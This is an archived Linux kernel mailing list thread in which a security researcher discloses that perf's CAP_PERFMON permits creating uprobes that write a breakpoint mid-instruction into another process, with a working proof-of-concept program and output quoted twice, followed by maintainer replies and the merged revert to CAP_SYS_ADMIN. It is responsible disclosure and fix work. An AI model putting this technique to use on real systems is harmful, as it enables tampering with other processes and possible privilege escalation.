* uprobes are destructive but exposed by perf under CAP_PERFMON
@ 2025-07-01 16:14 Jann Horn
2025-07-02 11:13 ` Mark Rutland
` (2 more replies)
0 siblings, 3 replies; 4+ messages in thread
From: Jann Horn @ 2025-07-01 16:14 UTC (permalink / raw)
To: Serge Hallyn, linux-security-module, Peter Zijlstra, Ingo Molnar,
Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
Liang, Kan, linux-perf-users
Cc: Kernel Hardening, linux-hardening, kernel list, Alexey Budankov,
James Morris
Since commit c9e0924e5c2b ("perf/core: open access to probes for
CAP_PERFMON privileged process"), it is possible to create uprobes
through perf_event_open() when the caller has CAP_PERFMON. uprobes can
have destructive effects, while my understanding is that CAP_PERFMON
is supposed to only let you _read_ stuff (like registers and stack
memory) from other processes, but not modify their execution.
uprobes (at least on x86) can be destructive because they have no
protection against poking in the middle of an instruction; basically
as long as the kernel manages to decode the instruction bytes at the
caller-specified offset as a relocatable instruction, a breakpoint
instruction can be installed at that offset.
This means uprobes can be used to alter what happens in another
process. It would probably be a good idea to go back to requiring
CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
where the kernel can prove that the software breakpoint poke cannot
break the target process. (Which seems harder than doing it for
kprobe, since kprobe can at least rely on symbols to figure out where
a function starts...)
As a small example, in one terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat target.c
#include <unistd.h>
#include <stdio.h>
__attribute__((noinline))
void bar(unsigned long value) {
printf("bar(0x%lx)\n", value);
}
__attribute__((noinline))
void foo(unsigned long value) {
value += 0x90909090;
bar(value);
}
void (*foo_ptr)(unsigned long value) = foo;
int main(void) {
while (1) {
printf("byte 1 of foo(): 0x%hhx\n", ((volatile unsigned char
*)(void*)foo)[1]);
foo_ptr(0);
sleep(1);
}
}
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3
jannh@horn:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target
[...]
00000000000011b0 <foo>:
11b0: b8 90 90 90 90 mov $0x90909090,%eax
11b5: 48 01 c7 add %rax,%rdi
11b8: eb d6 jmp 1190 <bar>
[...]
jannh@horn:~/test/perfmon-uprobepoke$ ./target
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
```
and in another terminal:
```
jannh@horn:~/test/perfmon-uprobepoke$ cat poke.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/perf_event.h>
int main(void) {
int uprobe_type;
FILE *uprobe_type_file =
fopen("/sys/bus/event_source/devices/uprobe/type", "r");
if (uprobe_type_file == NULL)
err(1, "fopen uprobe type");
if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1)
errx(1, "read uprobe type");
fclose(uprobe_type_file);
printf("uprobe type is %d\n", uprobe_type);
unsigned long target_off;
FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r");
if (!pof)
err(1, "popen nm");
if (fscanf(pof, "%lx", &target_off) != 1)
errx(1, "read target offset");
pclose(pof);
target_off += 1;
printf("will poke at 0x%lx\n", target_off);
struct perf_event_attr attr = {
.type = uprobe_type,
.size = sizeof(struct perf_event_attr),
.sample_period = 100000,
.sample_type = PERF_SAMPLE_IP,
.uprobe_path = (unsigned long)"target",
.probe_offset = target_off
};
int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
if (perf_fd == -1)
err(1, "perf_event_open");
char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0);
if (map == MAP_FAILED)
err(1, "mmap error");
printf("mmap success\n");
while (1) pause();
jannh@horn:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall
jannh@horn:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke
jannh@horn:~/test/perfmon-uprobepoke$ ./poke
uprobe type is 9
will poke at 0x11b1
mmap success
```
This results in the first terminal changing output as follows, showing
that 0xcc was written into the middle of the "mov" instruction,
modifying its immediate operand:
```
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0x90
bar(0x90909090)
byte 1 of foo(): 0xcc
bar(0x909090cc)
byte 1 of foo(): 0xcc
bar(0x909090cc)
```
It's probably possible to turn this into a privilege escalation by
doing things like clobbering part of the distance of a jump or call
instruction.
^ permalink raw reply [flat|nested] 4+ messages in thread* Re: uprobes are destructive but exposed by perf under CAP_PERFMON
2025-07-01 16:14 uprobes are destructive but exposed by perf under CAP_PERFMON Jann Horn
@ 2025-07-02 11:13 ` Mark Rutland
2025-07-02 11:58 ` Peter Zijlstra
2025-07-03 8:45 ` [tip: perf/urgent] perf: Revert to requiring CAP_SYS_ADMIN for uprobes tip-bot2 for Peter Zijlstra
2 siblings, 0 replies; 4+ messages in thread
From: Mark Rutland @ 2025-07-02 11:13 UTC (permalink / raw)
To: Jann Horn
Cc: Serge Hallyn, linux-security-module, Peter Zijlstra, Ingo Molnar,
Arnaldo Carvalho de Melo, Namhyung Kim, Alexander Shishkin,
Jiri Olsa, Ian Rogers, Adrian Hunter, Liang, Kan,
linux-perf-users, Kernel Hardening, linux-hardening, kernel list,
Alexey Budankov, James Morris
On Tue, Jul 01, 2025 at 06:14:51PM +0200, Jann Horn wrote:
> Since commit c9e0924e5c2b ("perf/core: open access to probes for
> CAP_PERFMON privileged process"), it is possible to create uprobes
> through perf_event_open() when the caller has CAP_PERFMON. uprobes can
> have destructive effects, while my understanding is that CAP_PERFMON
> is supposed to only let you _read_ stuff (like registers and stack
> memory) from other processes, but not modify their execution.
I'm not sure whether CAP_PERFMON is meant to ensure that, or simply
meant to provide lesser privileges than CAP_SYS_ADMIN, so I'll have to
leave that discussion to others. I agree it seems undesirable to permit
destructive effects.
> uprobes (at least on x86) can be destructive because they have no
> protection against poking in the middle of an instruction; basically
> as long as the kernel manages to decode the instruction bytes at the
> caller-specified offset as a relocatable instruction, a breakpoint
> instruction can be installed at that offset.
FWIW, similar issues would apply to other architectures (even those like
arm64 where instuctions are fixed-size and naturally aligned), as a
uprobe could be placed on a literal pool in a text section, corrupting
data.
It looks like c9e0924e5c2b reverts cleanly, so that's an option.
Mark.
> This means uprobes can be used to alter what happens in another
> process. It would probably be a good idea to go back to requiring
> CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
> where the kernel can prove that the software breakpoint poke cannot
> break the target process. (Which seems harder than doing it for
> kprobe, since kprobe can at least rely on symbols to figure out where
> a function starts...)
>
> As a small example, in one terminal:
> ```
> jannh@horn:~/test/perfmon-uprobepoke$ cat target.c
> #include <unistd.h>
> #include <stdio.h>
>
> __attribute__((noinline))
> void bar(unsigned long value) {
> printf("bar(0x%lx)\n", value);
> }
>
> __attribute__((noinline))
> void foo(unsigned long value) {
> value += 0x90909090;
> bar(value);
> }
>
> void (*foo_ptr)(unsigned long value) = foo;
>
> int main(void) {
> while (1) {
> printf("byte 1 of foo(): 0x%hhx\n", ((volatile unsigned char
> *)(void*)foo)[1]);
> foo_ptr(0);
> sleep(1);
> }
> }
> jannh@horn:~/test/perfmon-uprobepoke$ gcc -o target target.c -O3
> jannh@horn:~/test/perfmon-uprobepoke$ objdump --disassemble=foo target
> [...]
> 00000000000011b0 <foo>:
> 11b0: b8 90 90 90 90 mov $0x90909090,%eax
> 11b5: 48 01 c7 add %rax,%rdi
> 11b8: eb d6 jmp 1190 <bar>
> [...]
> jannh@horn:~/test/perfmon-uprobepoke$ ./target
> byte 1 of foo(): 0x90
> bar(0x90909090)
> byte 1 of foo(): 0x90
> bar(0x90909090)
> byte 1 of foo(): 0x90
> bar(0x90909090)
> byte 1 of foo(): 0x90
> bar(0x90909090)
> ```
>
> and in another terminal:
> ```
> jannh@horn:~/test/perfmon-uprobepoke$ cat poke.c
> #define _GNU_SOURCE
> #include <stdio.h>
> #include <unistd.h>
> #include <err.h>
> #include <sys/mman.h>
> #include <sys/syscall.h>
> #include <linux/perf_event.h>
>
> int main(void) {
> int uprobe_type;
> FILE *uprobe_type_file =
> fopen("/sys/bus/event_source/devices/uprobe/type", "r");
> if (uprobe_type_file == NULL)
> err(1, "fopen uprobe type");
> if (fscanf(uprobe_type_file, "%d", &uprobe_type) != 1)
> errx(1, "read uprobe type");
> fclose(uprobe_type_file);
> printf("uprobe type is %d\n", uprobe_type);
>
> unsigned long target_off;
> FILE *pof = popen("nm target | grep ' foo$' | cut -d' ' -f1", "r");
> if (!pof)
> err(1, "popen nm");
> if (fscanf(pof, "%lx", &target_off) != 1)
> errx(1, "read target offset");
> pclose(pof);
> target_off += 1;
> printf("will poke at 0x%lx\n", target_off);
>
> struct perf_event_attr attr = {
> .type = uprobe_type,
> .size = sizeof(struct perf_event_attr),
> .sample_period = 100000,
> .sample_type = PERF_SAMPLE_IP,
> .uprobe_path = (unsigned long)"target",
> .probe_offset = target_off
> };
> int perf_fd = syscall(__NR_perf_event_open, &attr, -1, 0, -1, 0);
> if (perf_fd == -1)
> err(1, "perf_event_open");
> char *map = mmap(NULL, 0x11000, PROT_READ, MAP_SHARED, perf_fd, 0);
> if (map == MAP_FAILED)
> err(1, "mmap error");
> printf("mmap success\n");
> while (1) pause();
> jannh@horn:~/test/perfmon-uprobepoke$ gcc -o poke poke.c -Wall
> jannh@horn:~/test/perfmon-uprobepoke$ sudo setcap cap_perfmon+pe poke
> jannh@horn:~/test/perfmon-uprobepoke$ ./poke
> uprobe type is 9
> will poke at 0x11b1
> mmap success
> ```
>
> This results in the first terminal changing output as follows, showing
> that 0xcc was written into the middle of the "mov" instruction,
> modifying its immediate operand:
> ```
> byte 1 of foo(): 0x90
> bar(0x90909090)
> byte 1 of foo(): 0x90
> bar(0x90909090)
> byte 1 of foo(): 0x90
> bar(0x90909090)
> byte 1 of foo(): 0xcc
> bar(0x909090cc)
> byte 1 of foo(): 0xcc
> bar(0x909090cc)
> ```
>
> It's probably possible to turn this into a privilege escalation by
> doing things like clobbering part of the distance of a jump or call
> instruction.
^ permalink raw reply [flat|nested] 4+ messages in thread* Re: uprobes are destructive but exposed by perf under CAP_PERFMON
2025-07-01 16:14 uprobes are destructive but exposed by perf under CAP_PERFMON Jann Horn
2025-07-02 11:13 ` Mark Rutland
@ 2025-07-02 11:58 ` Peter Zijlstra
2025-07-03 8:45 ` [tip: perf/urgent] perf: Revert to requiring CAP_SYS_ADMIN for uprobes tip-bot2 for Peter Zijlstra
2 siblings, 0 replies; 4+ messages in thread
From: Peter Zijlstra @ 2025-07-02 11:58 UTC (permalink / raw)
To: Jann Horn
Cc: Serge Hallyn, linux-security-module, Ingo Molnar,
Arnaldo Carvalho de Melo, Namhyung Kim, Mark Rutland,
Alexander Shishkin, Jiri Olsa, Ian Rogers, Adrian Hunter,
Liang, Kan, linux-perf-users, Kernel Hardening, linux-hardening,
kernel list, Alexey Budankov, James Morris
On Tue, Jul 01, 2025 at 06:14:51PM +0200, Jann Horn wrote:
> Since commit c9e0924e5c2b ("perf/core: open access to probes for
> CAP_PERFMON privileged process"), it is possible to create uprobes
> through perf_event_open() when the caller has CAP_PERFMON. uprobes can
> have destructive effects, while my understanding is that CAP_PERFMON
> is supposed to only let you _read_ stuff (like registers and stack
> memory) from other processes, but not modify their execution.
>
> uprobes (at least on x86) can be destructive because they have no
> protection against poking in the middle of an instruction; basically
> as long as the kernel manages to decode the instruction bytes at the
> caller-specified offset as a relocatable instruction, a breakpoint
> instruction can be installed at that offset.
>
> This means uprobes can be used to alter what happens in another
> process. It would probably be a good idea to go back to requiring
> CAP_SYS_ADMIN for installing uprobes, unless we can get to a point
> where the kernel can prove that the software breakpoint poke cannot
> break the target process. (Which seems harder than doing it for
> kprobe, since kprobe can at least rely on symbols to figure out where
> a function starts...)
>
> As a small example, in one terminal:
Urrggh... x86 instruction encoding wins again. Awesome find.
Yeah, I suppose I should go queue a revert of that commit.
^ permalink raw reply [flat|nested] 4+ messages in thread* [tip: perf/urgent] perf: Revert to requiring CAP_SYS_ADMIN for uprobes
2025-07-01 16:14 uprobes are destructive but exposed by perf under CAP_PERFMON Jann Horn
2025-07-02 11:13 ` Mark Rutland
2025-07-02 11:58 ` Peter Zijlstra
@ 2025-07-03 8:45 ` tip-bot2 for Peter Zijlstra
2 siblings, 0 replies; 4+ messages in thread
From: tip-bot2 for Peter Zijlstra @ 2025-07-03 8:45 UTC (permalink / raw)
To: linux-tip-commits; +Cc: Jann Horn, Peter Zijlstra (Intel), x86, linux-kernel
The following commit has been merged into the perf/urgent branch of tip:
Commit-ID: ba677dbe77af5ffe6204e0f3f547f3ba059c6302
Gitweb: https://git.kernel.org/tip/ba677dbe77af5ffe6204e0f3f547f3ba059c6302
Author: Peter Zijlstra <peterz@infradead.org>
AuthorDate: Wed, 02 Jul 2025 18:21:44 +02:00
Committer: Peter Zijlstra <peterz@infradead.org>
CommitterDate: Thu, 03 Jul 2025 10:33:55 +02:00
perf: Revert to requiring CAP_SYS_ADMIN for uprobes
Jann reports that uprobes can be used destructively when used in the
middle of an instruction. The kernel only verifies there is a valid
instruction at the requested offset, but due to variable instruction
length cannot determine if this is an instruction as seen by the
intended execution stream.
Additionally, Mark Rutland notes that on architectures that mix data
in the text segment (like arm64), a similar things can be done if the
data word is 'mistaken' for an instruction.
As such, require CAP_SYS_ADMIN for uprobes.
Fixes: c9e0924e5c2b ("perf/core: open access to probes for CAP_PERFMON privileged process")
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Link: https://lkml.kernel.org/r/CAG48ez1n4520sq0XrWYDHKiKxE_+WCfAK+qt9qkY4ZiBGmL-5g@mail.gmail.com
---
kernel/events/core.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index bf2118c..0db36b2 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -11116,7 +11116,7 @@ static int perf_uprobe_event_init(struct perf_event *event)
if (event->attr.type != perf_uprobe.type)
return -ENOENT;
- if (!perfmon_capable())
+ if (!capable(CAP_SYS_ADMIN))
return -EACCES;
/*
^ permalink raw reply related [flat|nested] 4+ messages in thread
end of thread, other threads:[~2025-07-03 8:45 UTC | newest]
Thread overview: 4+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2025-07-01 16:14 uprobes are destructive but exposed by perf under CAP_PERFMON Jann Horn
2025-07-02 11:13 ` Mark Rutland
2025-07-02 11:58 ` Peter Zijlstra
2025-07-03 8:45 ` [tip: perf/urgent] perf: Revert to requiring CAP_SYS_ADMIN for uprobes tip-bot2 for Peter Zijlstra
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox